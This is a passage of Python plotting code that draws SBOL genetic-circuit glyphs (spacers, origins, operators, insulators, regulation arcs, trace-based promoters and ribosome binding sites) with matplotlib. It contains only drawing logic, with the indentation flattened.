linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(l1)
ax.add_line(l1_top)
ax.add_line(l1_bottom)
# White rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(end, -y_extent),
(end, y_extent)],
edgecolor=(1,1,1), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
return final_start, final_end
def sbol_user_defined (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL user-defined element renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 12.0
y_extent = 3.0
linestyle = '-'
fill_color = (1,1,1)
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'fill_color' in list(opts.keys()):
fill_color = opts['fill_color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Add start padding (orientation is ignored for this part)
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=color, facecolor=fill_color, linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_signature (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL signature renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 12.0
y_extent = 3.0
linestyle = '-'
fill_color = (1,1,1)
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'fill_color' in list(opts.keys()):
fill_color = opts['fill_color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
direction = 'F'
if start > end:
direction = 'R'
temp_end = end
end = start
start = temp_end
final_end = prev_end
final_start = prev_end
if direction == 'F':
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
else:
final_start = prev_end
end = prev_end+end_pad
start = end+x_extent
final_start = start+start_pad
indent_fac = (y_extent*2.0)*0.3
cross_width = (y_extent*2.0)*0.7
if direction == 'F':
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=color, facecolor=fill_color, linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
top1x = start + indent_fac
top1y = y_extent - indent_fac
top2x = start + cross_width
top2y = y_extent - indent_fac
bot1x = start + indent_fac
bot1y = -y_extent + indent_fac
bot2x = start + cross_width
bot2y = -y_extent + indent_fac
lcross1 = Line2D([top1x,bot2x],[top1y,bot2y],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
lcross2 = Line2D([top2x,bot1x],[top2y,bot1y],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(lcross1)
ax.add_line(lcross2)
lsign = Line2D([bot2x+indent_fac,end-indent_fac],[-y_extent+indent_fac,-y_extent+indent_fac],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(lsign)
else:
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start-x_extent, -y_extent),
(start-x_extent, y_extent)],
edgecolor=color, facecolor=fill_color, linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
top1x = start - indent_fac
top1y = y_extent - indent_fac
top2x = start - cross_width
top2y = y_extent - indent_fac
bot1x = start - indent_fac
bot1y = -y_extent + indent_fac
bot2x = start - cross_width
bot2y = -y_extent + indent_fac
lcross1 = Line2D([top1x,bot2x],[top1y,bot2y],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
lcross2 = Line2D([top2x,bot1x],[top2y,bot1y],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(lcross1)
ax.add_line(lcross2)
lsign = Line2D([bot2x-indent_fac,end+indent_fac],[y_extent-indent_fac,y_extent-indent_fac],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(lsign)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_restriction_site (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL restriction site renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
y_extent = 4.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Add start padding (orientation is ignored for this part)
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start + linewidth
final_end = end+end_pad
l1 = Line2D([start,start],[-y_extent,y_extent],
linewidth=linewidth, color=color, zorder=12+zorder_add, linestyle=linestyle)
ax.add_line(l1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_spacer (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL spacer renderer.
"""
# Default options
zorder_add = 0.0
color = (1,1,1)
edgecolor = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 6.0
y_extent = 6.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'edgecolor' in list(opts.keys()):
edgecolor = opts['edgecolor']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Add start padding (orientation is ignored for this part)
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
rbs_center = (start+((end-start)/2.0),0)
center_x = start+(end-start)/2.0
radius = x_extent/2
delta = radius - 0.5 * radius * math.sqrt(2)
l1 = Line2D([start+delta,end-delta],[radius-delta,-1*radius+delta],
linewidth=linewidth, color=edgecolor, zorder=12+zorder_add, linestyle=linestyle)
l2 = Line2D([start+delta,end-delta],[-1*radius+delta,radius-delta],
linewidth=linewidth, color=edgecolor, zorder=12+zorder_add, linestyle=linestyle)
c1 = Circle(rbs_center, x_extent/2.0, linewidth=linewidth, edgecolor=edgecolor,
facecolor=color, zorder=12+zorder_add)
ax.add_patch(c1)
ax.add_line(l1)
ax.add_line(l2)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_origin (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL origin renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 10.0
y_extent = 10.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Add start padding (orientation is ignored for this part)
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
ori_center = (start+((end-start)/2.0),0)
c1 = Circle(ori_center, x_extent/2.0, linewidth=linewidth, edgecolor=color,
facecolor=(1,1,1), zorder=12+zorder_add)
ax.add_patch(c1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_operator (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL operator renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 6.0
y_extent = 3.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Add start padding (orientation is ignored for this part)
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=(0,0,0), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
def sbol_insulator (ax, type, num, start, end, prev_end, scale, linewidth, opts):
""" Built-in SBOL insulator renderer.
"""
# Default options
zorder_add = 0.0
color = (0,0,0)
start_pad = 2.0
end_pad = 2.0
x_extent = 8.0
y_extent = 4.0
linestyle = '-'
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
# Add start padding (orientation is ignored for this part)
final_end = end
final_start = prev_end
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
#white rectangle overlays backbone line
p1 = Polygon([(start, y_extent),
(start, -y_extent),
(start+x_extent, -y_extent),
(start+x_extent, y_extent)],
edgecolor=(0,0,0), facecolor=(1,1,1), linewidth=linewidth, zorder=11+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
bits = 5.0
gap_size = ((end-start)/bits)
x_inset_start = start + gap_size
x_inset_end = start + ((bits-1.0)*gap_size)
# Inside rectangle
p2 = Polygon([(x_inset_start, y_extent-gap_size),
(x_inset_start, -y_extent+gap_size),
(x_inset_end, -y_extent+gap_size),
(x_inset_end, y_extent-gap_size)],
edgecolor=(0,0,0), facecolor=(1,1,1), linewidth=linewidth, zorder=12+zorder_add,
path_effects=[Stroke(joinstyle="miter")]) # Workaround for matplotlib < 1.4.0
ax.add_patch(p1)
ax.add_patch(p2)
if opts != None and 'label' in list(opts.keys()):
if final_start > final_end:
write_label(ax, opts['label'], final_end+((final_start-final_end)/2.0), opts=opts)
else:
write_label(ax, opts['label'], final_start+((final_end-final_start)/2.0), opts=opts)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
# Not used at present
def temporary_repressor (ax, type, num, start, end, prev_end, scale, linewidth, opts):
# Default options
zorder_add = 0.0
color = (0.7,0.7,0.7)
start_pad = 2.0
end_pad = 2.0
y_extent = 10
x_extent = 10
arrowhead_height = 2
arrowhead_length = 4
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'start_pad' in list(opts.keys()):
start_pad = opts['start_pad']
if 'end_pad' in list(opts.keys()):
end_pad = opts['end_pad']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
    # Check direction and add start padding
dir_fac = 1.0
final_end = end
final_start = prev_end
if start > end:
dir_fac = -1.0
start = prev_end+end_pad+x_extent
end = prev_end+end_pad
final_end = start+start_pad
else:
start = prev_end+start_pad
end = start+x_extent
final_end = end+end_pad
e1center = (start+((end-start)/2.0),0)
e2center = (start+((end-start)/2.0)+x_extent/3.75,0)
e1 = Ellipse(e1center, y_extent/2, y_extent, edgecolor=(0,0,0), facecolor=color,
linewidth=linewidth, fill=True, zorder=12+zorder_add)
e2 = Ellipse(e2center, y_extent/2, y_extent, edgecolor=(0,0,0), facecolor=color,
linewidth=linewidth, fill=True, zorder=11+zorder_add)
ax.add_patch(e1)
ax.add_patch(e2)
if final_start > final_end:
return prev_end, final_start
else:
return prev_end, final_end
###############################################################################
# Regulation renderers
###############################################################################
def repress (ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts):
""" Standard repression regulation renderer.
"""
regulation(ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts)
def induce (ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts):
""" Standard induction regulation renderer.
"""
regulation(ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts)
def connect (ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts):
""" Standard induction regulation renderer.
"""
regulation(ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts)
def regulation (ax, type, num, from_part, to_part, scale, linewidth, arc_height_index, opts):
""" General function for drawing regulation arcs.
"""
color = (0.0,0.0,0.0)
arrowhead_length = 3
linestyle = '-'
arcHeightConst = 15
arcHeightSpacing = 5
arcHeightStart = 10
arcHeight = arcHeightConst + arc_height_index*arcHeightSpacing
arcHeightEnd = arcHeightStart*1.5
arc_start_x_offset = 0.0
arc_end_x_offset = 0.0
# Reset defaults if provided
if opts != None:
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linestyle' in list(opts.keys()):
linestyle = opts['linestyle']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'color' in list(opts.keys()):
color = opts['color']
if 'arc_height' in list(opts.keys()):
arcHeight = opts['arc_height']
if 'arc_height_const' in list(opts.keys()):
arcHeightConst = opts['arc_height_const']
if 'arc_height_spacing' in list(opts.keys()):
arcHeightSpacing = opts['arc_height_spacing']
if 'arc_height_start' in list(opts.keys()):
arcHeightStart = opts['arc_height_start']
if 'arc_height_end' in list(opts.keys()):
arcHeightEnd = opts['arc_height_end']
if 'arc_start_x_offset' in list(opts.keys()):
arc_start_x_offset = opts['arc_start_x_offset']
if 'arc_end_x_offset' in list(opts.keys()):
arc_end_x_offset = opts['arc_end_x_offset']
if opts == None or 'arc_height' not in list(opts.keys()):
arcHeight = arcHeightConst + arc_height_index*arcHeightSpacing
startHeight = arcHeightStart
start = ((from_part['start'] + from_part['end']) / 2) + arc_start_x_offset
end = ((to_part['start'] + to_part['end']) / 2) + arc_end_x_offset
    top = arcHeight
    base = startHeight
indHeight = arrowhead_length
corr = linewidth
if to_part['fwd'] == False:
base = -1*startHeight
arcHeightEnd = -arcHeightEnd
top = -1*arcHeight
indHeight = -1*arrowhead_length
corr *= -1
line_away = Line2D([start,start],[base,top],
linewidth=linewidth, color=color, zorder=12, linestyle=linestyle)
line_across = Line2D([start,end],[top,top],
linewidth=linewidth, color=color, zorder=12, linestyle=linestyle)
line_toward = Line2D([end,end],[top,arcHeightEnd+corr],
linewidth=linewidth, color=color, zorder=12, linestyle=linestyle)
line_rep = Line2D([end-arrowhead_length,end+arrowhead_length],[arcHeightEnd,arcHeightEnd],
linewidth=linewidth, color=color, zorder=12, linestyle='-')
line_ind1 = Line2D([end-arrowhead_length,end],[arcHeightEnd+indHeight,arcHeightEnd],
linewidth=linewidth, color=color, zorder=12, linestyle='-')
line_ind2 = Line2D([end+arrowhead_length,end],[arcHeightEnd+indHeight,arcHeightEnd],
linewidth=linewidth, color=color, zorder=12, linestyle='-')
if(type == 'Repression'):
ax.add_line(line_rep)
ax.add_line(line_away)
ax.add_line(line_across)
ax.add_line(line_toward)
if(type == 'Activation'):
ax.add_line(line_ind1)
ax.add_line(line_ind2)
ax.add_line(line_away)
ax.add_line(line_across)
ax.add_line(line_toward)
if(type == 'Connection'):
verts = [ (start, base), (start, top), (end, top), (end, base) ]
codes = [Path.MOVETO, Path.CURVE4, Path.CURVE4, Path.CURVE4]
path1 = Path(verts, codes)
patch = patches.PathPatch(path1, facecolor='none', lw=linewidth, edgecolor=color)
ax.add_patch(patch)
###############################################################################
# Trace Icon Renderers (icon width corresponds to trace data)
###############################################################################
def trace_promoter_start (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based promoter renderer.
"""
# Default options
zorder_add = 0.0
color = (0.0,0.0,1.0)
y_offset = 0.0
y_extent = 6.0
x_extent = 30.0
arrowhead_height = 0.5
arrowhead_length = 15.0
highlight_y_extent = 0.8
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'highlight_y_extent' in list(opts.keys()):
highlight_y_extent = opts['highlight_y_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
    # Check direction
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
y_offset = -y_offset
# Draw the promoter symbol
l1 = Line2D([start_bp,start_bp],[0+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth,
color=color, zorder=14+zorder_add)
l2 = Line2D([start_bp,start_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*0.5*scale],
[dir_fac*y_extent+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth,
color=color, zorder=14+zorder_add)
ax.add_line(l1)
ax.add_line(l2)
p1 = Polygon([(start_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*scale,
dir_fac*y_extent+(arrowhead_height)+y_offset),
(start_bp+dir_fac*(x_extent*scale), dir_fac*y_extent+y_offset),
(start_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*scale,
dir_fac*y_extent-(arrowhead_height)+y_offset)],
facecolor=color, edgecolor=color, linewidth=linewidth, zorder=14+zorder_add,
        path_effects=[Stroke(joinstyle="miter")]) # This is a workaround for matplotlib < 1.4.0
ax.add_patch(p1)
# Shade the promoter area (normally smaller than symbol extent)
p2 = Polygon([(start_bp, -highlight_y_extent+y_offset),
(start_bp, highlight_y_extent+y_offset),
(end_bp, highlight_y_extent+y_offset),
(end_bp, -highlight_y_extent+y_offset)], facecolor=color, edgecolor=color, linewidth=linewidth, zorder=14+zorder_add,
        path_effects=[Stroke(joinstyle="miter")]) # This is a workaround for matplotlib < 1.4.0
ax.add_patch(p2)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
def trace_promoter (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based promoter renderer with arrow at TSS.
"""
# Default options
zorder_add = 0.0
color = (0.0,0.0,1.0)
y_offset = 0.0
y_extent = 6.0
x_extent = 30.0
arrowhead_height = 0.5
arrowhead_length = 15.0
highlight_y_extent = 0.8
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'highlight_y_extent' in list(opts.keys()):
highlight_y_extent = opts['highlight_y_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
    # Check direction
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
y_offset = -y_offset
# Draw the promoter symbol
l1 = Line2D([end_bp,end_bp],[0+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth,
color=color, zorder=14+zorder_add)
l2 = Line2D([end_bp,end_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*0.5*scale],
[dir_fac*y_extent+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth,
color=color, zorder=14+zorder_add)
ax.add_line(l1)
ax.add_line(l2)
p1 = Polygon([(end_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*scale,
dir_fac*y_extent+(arrowhead_height)+y_offset),
(end_bp+dir_fac*(x_extent*scale), dir_fac*y_extent+y_offset),
(end_bp+dir_fac*x_extent*scale-dir_fac*arrowhead_length*scale,
dir_fac*y_extent-(arrowhead_height)+y_offset)],
facecolor=color, edgecolor=color, linewidth=linewidth, zorder=14+zorder_add,
        path_effects=[Stroke(joinstyle="miter")]) # This is a workaround for matplotlib < 1.4.0
ax.add_patch(p1)
# Shade the promoter area (normally smaller than symbol extent)
p2 = Polygon([(start_bp, -highlight_y_extent+y_offset),
(start_bp, highlight_y_extent+y_offset),
(end_bp, highlight_y_extent+y_offset),
(end_bp, -highlight_y_extent+y_offset)], facecolor=color, edgecolor=color, linewidth=linewidth, zorder=14+zorder_add,
        path_effects=[Stroke(joinstyle="miter")]) # This is a workaround for matplotlib < 1.4.0
ax.add_patch(p2)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
def trace_rbs (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based ribosome binding site renderer.
"""
# Default options
zorder_add = 0.0
color = (0.16,0.68,0.15)
y_offset = 0.0
y_extent = 3.5
x_extent = 10.0
highlight_y_extent = 0.8
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'highlight_y_extent' in list(opts.keys()):
highlight_y_extent = opts['highlight_y_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
    # Check direction
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
# Draw the RBS symbol
l1 = Line2D([start_bp,start_bp],[0+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth, color=color, zorder=14+zorder_add)
ax.add_line(l1)
c1 = Ellipse((start_bp,dir_fac*y_extent+y_offset),width=(x_extent*scale),height=y_extent*0.4,color=color, zorder=14+zorder_add)
ax.add_artist(c1)
    # Shade the RBS area (normally smaller than symbol extent)
p2 = Polygon([(start_bp, -highlight_y_extent+y_offset),
(start_bp, highlight_y_extent+y_offset),
(end_bp, highlight_y_extent+y_offset),
(end_bp, -highlight_y_extent+y_offset)], facecolor=color, edgecolor=color, linewidth=linewidth, zorder=14+zorder_add,
        path_effects=[Stroke(joinstyle="miter")]) # This is a workaround for matplotlib < 1.4.0
ax.add_patch(p2)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
def trace_user_defined (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based user defined region renderer.
"""
# Default options
zorder_add = 0.0
color = (0.7,0.7,0.7)
hatch = ''
y_offset = 0.0
y_extent = 1.5
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'hatch' in list(opts.keys()):
hatch = opts['hatch']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
    # Check direction
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
    # Draw the user-defined region symbol
p1 = Polygon([(start_bp, y_extent+y_offset),
(start_bp, -y_extent+y_offset),
(end_bp-dir_fac*scale, -y_extent+y_offset),
(end_bp-dir_fac*scale, y_extent+y_offset)],
edgecolor=(0.0,0.0,0.0), facecolor=color, linewidth=linewidth,
hatch=hatch, zorder=15+zorder_add,
        path_effects=[Stroke(joinstyle="miter")]) # This is a workaround for matplotlib < 1.4.0
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
def trace_cds (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based coding sequence renderer.
"""
# Default options
zorder_add = 0.0
color = (0.7,0.7,0.7)
hatch = ''
y_offset = 0.0
